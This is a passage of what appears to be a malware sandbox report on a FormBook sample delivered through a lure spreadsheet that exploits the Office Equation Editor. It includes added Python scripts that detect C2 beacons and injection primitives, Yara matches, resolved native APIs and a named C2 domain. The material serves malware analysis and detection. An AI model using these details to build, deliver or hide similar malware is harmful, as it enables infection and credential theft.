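def looks_like_formbook_get(raw):
    """True when a request matches the two-parameter, Connection: close beacon shape."""
    method, target, headers = parse_request(raw)
    if method != "GET" or "?" not in target:
        return False
    path, _, query = target.partition("?")
    if not C2_PATH_RE.match(path):
        return False
    # Split the query by hand: parse_qsl would turn '+' in base64 into a space.
    params = [p.split("=", 1) for p in query.split("&")]
    if len(params) != 2 or any(len(p) != 2 for p in params):
        return False
    if headers.get("connection", "").lower() != "close":
        return False
    return bool(B64_RE.match(params[1][1]))


def tcp_without_dns(events):
    """IPs contacted over TCP before any DNS answer returned them, in event order."""
    resolved, flagged = set(), []
    for ev in events:
        if ev[0] == "dns":
            resolved.update(ev[2])
        elif ev[0] == "tcp" and ev[1] not in resolved and ev[1] not in flagged:
            flagged.append(ev[1])
    return flagged


def analyze(events):
    """Summarise both findings for a stream of ("dns"|"tcp"|"http", ...) events."""
    c2_hosts = []
    for ev in events:
        if ev[0] == "http" and looks_like_formbook_get(ev[1]):
            host = parse_request(ev[1])[2].get("host", "")
            if host not in c2_hosts:
                c2_hosts.append(host)
    return {"tcp_without_dns": tcp_without_dns(events), "c2_like_requests": c2_hosts}


if __name__ == "__main__":
    print(analyze(SAMPLE_EVENTS))
```

The ordering check matters: a connection is only "without DNS" if no earlier answer returned that address, so a pcap or proxy log must be replayed in capture order. Match the beacon heuristic against the resolved host, not the IP, since FormBook rotates through a list of domains of which only www.20svip.com was contacted in this run.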

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

Malicious sample detected (through community Yara rule)
Matched rules (each of the sources below matched both):
    autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
    detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Sources:
    0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
    00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, type: MEMORY
    0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
    0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
    0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
    0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
    13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
    13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Content from the yellow bar above 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 (the trailing digits are spreadsheet row numbers picked up by the OCR)
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ohms[1].exe
Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code functions resolving native APIs:
    5_2_005CB2EE NtQuerySystemInformation
    5_2_005CB2CC NtQuerySystemInformation
    7_2_0211B2EE NtQuerySystemInformation
    7_2_0211B2CC NtQuerySystemInformation
    11_2_020DB2EE NtQuerySystemInformation
    11_2_020DB2CC NtQuerySystemInformation
Source: C:\Users\Public\vbc.exe | Code functions resolving native APIs:
    13_2_0041A060 NtClose
    13_2_0041A110 NtAllocateVirtualMemory
    13_2_00419F30 NtCreateFile
    13_2_00419FE0 NtReadFile
    13_2_00C700C4 NtCreateFile, LdrInitializeThunk
    13_2_00C70048 NtProtectVirtualMemory, LdrInitializeThunk
    13_2_00C70078 NtResumeThread, LdrInitializeThunk
    13_2_00C6F9F0 NtClose, LdrInitializeThunk
    13_2_00C6F900 NtReadFile, LdrInitializeThunk
    13_2_00C6FAD0 NtAllocateVirtualMemory, LdrInitializeThunk
    13_2_00C6FAE8 NtQueryInformationProcess, LdrInitializeThunk
    13_2_00C6FBB8 NtQueryInformationToken, LdrInitializeThunk
    13_2_00C6FB68 NtFreeVirtualMemory, LdrInitializeThunk
    13_2_00C6FC90 NtUnmapViewOfSection, LdrInitializeThunk
    13_2_00C6FC60 NtMapViewOfSection, LdrInitializeThunk
    13_2_00C6FDC0 NtQuerySystemInformation, LdrInitializeThunk
    13_2_00C6FD8C NtDelayExecution, LdrInitializeThunk
    13_2_00C6FED0 NtAdjustPrivilegesToken, LdrInitializeThunk
    13_2_00C6FEA0 NtReadVirtualMemory, LdrInitializeThunk
    13_2_00C6FFB4 NtCreateSection, LdrInitializeThunk
    13_2_00C710D0 NtOpenProcessToken
    13_2_00C70060 NtQuerySection
    13_2_00C701D4 NtSetValueKey
    13_2_00C71148 NtOpenThread
    13_2_00C7010C NtOpenDirectoryObject
    13_2_00C707AC NtCreateMutant
    13_2_00C6F8CC NtWaitForSingleObject
    13_2_00C71930 NtSetContextThread
    13_2_00C6F938 NtWriteFile
    13_2_00C6FAB8 NtQueryValueKey
    13_2_00C6FA50 NtEnumerateValueKey
    13_2_00C6FA20 NtQueryInformationFile
    13_2_00C6FBE8 NtQueryVirtualMemory
    13_2_00C6FB50 NtCreateKey
    13_2_00C70C40 NtGetContextThread
    13_2_00C6FC48 NtSetInformationFile
    13_2_00C6FC30 NtOpenProcess
    13_2_00C71D80 NtSuspendThread
    13_2_00C6FD5C NtEnumerateKey
    13_2_00C6FE24 NtWriteVirtualMemory
    13_2_00C6FFFC NtCreateProcessEx
    13_2_00C6FF34 NtQueueApcThread
Source: C:\Windows\SysWOW64\cmmon32.exe | Code functions resolving native APIs:
    15_2_01FB00C4 NtCreateFile, LdrInitializeThunk
    15_2_01FB07AC NtCreateMutant, LdrInitializeThunk
    15_2_01FAF9F0 NtClose, LdrInitializeThunk
    15_2_01FAF900 NtReadFile, LdrInitializeThunk
    15_2_01FAFBB8 NtQueryInformationToken, LdrInitializeThunk
    15_2_01FAFB68 NtFreeVirtualMemory, LdrInitializeThunk
    15_2_01FAFB50 NtCreateKey, LdrInitializeThunk
    15_2_01FAFAE8 NtQueryInformationProcess, LdrInitializeThunk
    15_2_01FAFAD0 NtAllocateVirtualMemory, LdrInitializeThunk
    15_2_01FAFAB8 NtQueryValueKey, LdrInitializeThunk
    15_2_01FAFDC0 NtQuerySystemInformation, LdrInitializeThunk
    15_2_01FAFD8C NtDelayExecution, LdrInitializeThunk
    15_2_01FAFC60 NtMapViewOfSection, LdrInitializeThunk
    15_2_01FAFFB4 NtCreateSection, LdrInitializeThunk
    15_2_01FAFED0 NtAdjustPrivilegesToken, LdrInitializeThunk
    15_2_01FB01D4 NtSetValueKey
    15_2_01FB1148 NtOpenThread
    15_2_01FB010C NtOpenDirectoryObject
    15_2_01FB10D0 NtOpenProcessToken
    15_2_01FB0078 NtResumeThread
    15_2_01FB0060 NtQuerySection
    15_2_01FB0048 NtProtectVirtualMemory
    15_2_01FAF938 NtWriteFile
    15_2_01FB1930 NtSetContextThread
    15_2_01FAF8CC NtWaitForSingleObject
    15_2_01FAFBE8 NtQueryVirtualMemory
    15_2_01FAFA50 NtEnumerateValueKey
    15_2_01FAFA20 NtQueryInformationFile
    15_2_01FB1D80 NtSuspendThread
    15_2_01FAFD5C NtEnumerateKey
    15_2_01FAFC90 NtUnmapViewOfSection
    15_2_01FAFC48 NtSetInformationFile
    15_2_01FB0C40 NtGetContextThread
    15_2_01FAFC30 NtOpenProcess
    15_2_01FAFFFC NtCreateProcessEx
    15_2_01FAFF34 NtQueueApcThread
    15_2_01FAFEA0 NtReadVirtualMemory
    15_2_01FAFE24 NtWriteVirtualMemory
    15_2_000DA060 NtClose
    15_2_000DA110 NtAllocateVirtualMemory
    15_2_000D9F30 NtCreateFile
    15_2_000D9FE0 NtReadFile
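The native-API list above is the static side of the injection behaviour the report flags at the top (process hollowing, APC queuing, section mapping): the hollowed vbc.exe instance (sandbox process 13, matching the 0000000D memory dumps) and cmmon32.exe (process 15) both resolve NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread, NtQueueApcThread, NtCreateSection and NtMapViewOfSection, while the PowerShell instances resolve only NtQuerySystemInformation. The script below groups such "Code function" entries per process and reports which complete primitive sets were resolved. It is an added example written for this page, not the sandbox's own logic; the technique-to-primitive groupings are the author's assumption, and the sample lines are a constructed subset of this report's entries.

```python
import re
from collections import defaultdict

# Native-API groupings per injection technique. These sets are the author's
# assumption for this example; they are not the sandbox's own signature logic.
TECHNIQUES = {
    "process hollowing": {
        "NtCreateProcessEx", "NtUnmapViewOfSection", "NtWriteVirtualMemory",
        "NtSetContextThread", "NtResumeThread",
    },
    "APC injection": {"NtOpenThread", "NtWriteVirtualMemory", "NtQueueApcThread"},
    "section mapping": {"NtCreateSection", "NtMapViewOfSection"},
}

# Matches "<pid>_<pass>_<addr> <api>,<api>," whether or not the line still
# carries the report's "Code function:" prefix.
FUNC_RE = re.compile(r"\b(\d+)_(\d+)_([0-9A-Fa-f]{8})\s*(.*)$")


def parse_code_functions(lines):
    """Return {pid: {address: [Nt*/Zw* names resolved in that function]}}."""
    by_pid = defaultdict(dict)
    for line in lines:
        m = FUNC_RE.search(line)
        if not m:
            continue
        pid, _pass, addr, apis = m.groups()
        names = [a.strip() for a in apis.split(",")]
        # Keep only native syscall stubs; LdrInitializeThunk and blanks are dropped.
        by_pid[int(pid)][addr.upper()] = [n for n in names if n.startswith(("Nt", "Zw"))]
    return dict(by_pid)


def api_set(funcs):
    """Flatten one process's function map into the set of native APIs it resolves."""
    return {name for names in funcs.values() for name in names}


def matched_techniques(apis):
    """Return {technique: primitives still missing}; an empty set is a full match."""
    return {tech: need - apis for tech, need in TECHNIQUES.items()}


def flag_injection(lines):
    """Return {pid: sorted techniques whose complete primitive set was resolved}."""
    return {
        pid: sorted(t for t, missing in matched_techniques(api_set(funcs)).items() if not missing)
        for pid, funcs in parse_code_functions(lines).items()
    }


# Constructed sample: a subset of this report's entries for processes 5, 13
# and 15, in both the raw extracted form and the cleaned indented form.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_005CB2EE NtQuerySystemInformation,",
    r"Source: C:\Users\Public\vbc.exeCode function: 13_2_00C70078 NtResumeThread,LdrInitializeThunk,",
    "    13_2_00C6FC90 NtUnmapViewOfSection, LdrInitializeThunk",
    "    13_2_00C6FC60 NtMapViewOfSection, LdrInitializeThunk",
    "    13_2_00C6FFB4 NtCreateSection, LdrInitializeThunk",
    "    13_2_00C71148 NtOpenThread",
    "    13_2_00C71930 NtSetContextThread",
    "    13_2_00C6FE24 NtWriteVirtualMemory",
    "    13_2_00C6FFFC NtCreateProcessEx",
    "    13_2_00C6FF34 NtQueueApcThread",
    "    15_2_01FAFC60 NtMapViewOfSection, LdrInitializeThunk",
    "    15_2_01FAFFB4 NtCreateSection, LdrInitializeThunk",
    "    15_2_01FAFE24 NtWriteVirtualMemory",
]

if __name__ == "__main__":
    for pid, techs in sorted(flag_injection(SAMPLE_LINES).items()):
        print(pid, techs or "no complete injection primitive set")
```

Resolving a primitive is not the same as calling it, and FormBook resolves far more of ntdll than it uses in any one run, so treat a full set as a triage hint. The runtime signatures in the report header (thread context modified in another process, APC queued in another process, process hollowing) are the evidence that the primitives were actually exercised.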
Source: C:\Users\Public\vbc.exe | Code functions: 4_2_001E51C0, 4_2_001E7298, 4_2_001E62F0, 4_2_001EE578, 4_2_001E5930, 4_2_001E0DF8, 4_2_001E80F8, 4_2_001E80E8, 4_2_001E5118, 4_2_001E718A, 4_2_001E92F0, 4_2_001E92E0, 4_2_001EA43F, 4_2_001E9510, 4_2_001E9500, 4_2_001E45F2, 4_2_001E97D8, 4_2_001E97C8, 4_2_001EE802, 4_2_001E9991, 4_2_001EEA60, 4_2_001E5DA0, 4_2_001E8F58, 4_2_003230D0, 4_2_00322CC0, 4_2_00324532, 4_2_0032416F, 4_2_00323720, 4_2_00324813, 4_2_00324802, 4_2_003230BF, 4_2_00320950, 4_2_00323AC8, 4_2_00323710, 4_2_00324779, 4_2_00324768, 4_2_003247B4, 4_2_003247A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_029E1BE2
Source: C:\Users\Public\vbc.exe | Code functions: 13_2_00401030, 13_2_0041E1A2, 13_2_00402D90, 13_2_00409E40, 13_2_00402FB0, 13_2_00C7E0C6, 13_2_00C83040, 13_2_00C9905A, 13_2_00CAD005, 13_2_00C7E2E9, 13_2_00D21238, 13_2_00C7F3CF, 13_2_00CA63DB, 13_2_00D263BF, 13_2_00C87353, 13_2_00CCA37B, 13_2_00C82305, 13_2_00C91489, 13_2_00CB5485, 13_2_00CBD47D, 13_2_00C9C5F0, 13_2_00CC6540, 13_2_00C8351F, 13_2_00C8E6C1, 13_2_00C84680, 13_2_00D22622, 13_2_00CCA634, 13_2_00CB57C3, 13_2_00D0579A, 13_2_00C8C7BC, 13_2_00D1F8EE, 13_2_00C8C85C, 13_2_00CA286D, 13_2_00C969FE, 13_2_00D2098E, 13_2_00C829B2, 13_2_00D05955, 13_2_00D33A83, 13_2_00D0DBDA, 13_2_00C7FBD7, 13_2_00D2CBA4, 13_2_00CA7B00, 13_2_00D1FDDD, 13_2_00C8CD5B, 13_2_00CB0D3B, 13_2_00C9EE4C, 13_2_00CB2E2F, 13_2_00D1CFB1, 13_2_00CADF7C, 13_2_00C90F3F
Source: C:\Windows\SysWOW64\cmmon32.exe | Code functions: 15_2_02061238, 15_2_01FBE0C6, 15_2_0200A37B, 15_2_01FD905A, 15_2_020663BF, 15_2_01FC3040, 15_2_01FED005, 15_2_01FE63DB, 15_2_01FBF3CF, 15_2_01FC7353, 15_2_01FC2305, 15_2_01FBE2E9, 15_2_01FDC5F0, 15_2_02062622, 15_2_0200A634, 15_2_01FC351F, 15_2_01FD1489, 15_2_01FF5485, 15_2_01FFD47D, 15_2_0204579A, 15_2_01FF57C3, 15_2_01FCC7BC, 15_2_01FCE6C1, 15_2_02006540, 15_2_01FC4680, 15_2_01FD69FE, 15_2_01FC29B2, 15_2_02073A83, 15_2_01FE286D, 15_2_01FCC85C, 15_2_0206CBA4, 15_2_0204DBDA, 15_2_01FBFBD7, 15_2_0205F8EE, 15_2_01FE7B00, 15_2_02045955, 15_2_0206098E, 15_2_01FCCD5B, 15_2_01FF0D3B, 15_2_0205CFB1, 15_2_01FEDF7C, 15_2_01FD0F3F, 15_2_01FDEE4C, 15_2_01FF2E2F, 15_2_0205FDDD, 15_2_000DE1A2, 15_2_000C2D90, 15_2_000C9E40, 15_2_000C2FB0
Source: Refno.191938.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Users\Public\vbc.exe | Code function: String function: 00C7E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 00CEF970 appears 84 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 00CC3F92 appears 132 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 00CC373B appears 244 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 00C7DF5C appears 119 times
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 01FBE2A8 appears 38 times
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 0200373B appears 244 times
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 02003F92 appears 132 times
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 0202F970 appears 84 times
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 01FBDF5C appears 119 times
Source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: ohms[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: zFVxYeAVOjnwuB.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@17/10@3/2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_005CACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_005CACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0211ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0211ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_020DACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_020DACB7 AdjustTokenPrivileges,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Refno.191938.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRCE56.tmp
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: Refno.191938.xlsxVirustotal: Detection: 30%
          Source: Refno.191938.xlsxReversingLabs: Detection: 23%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
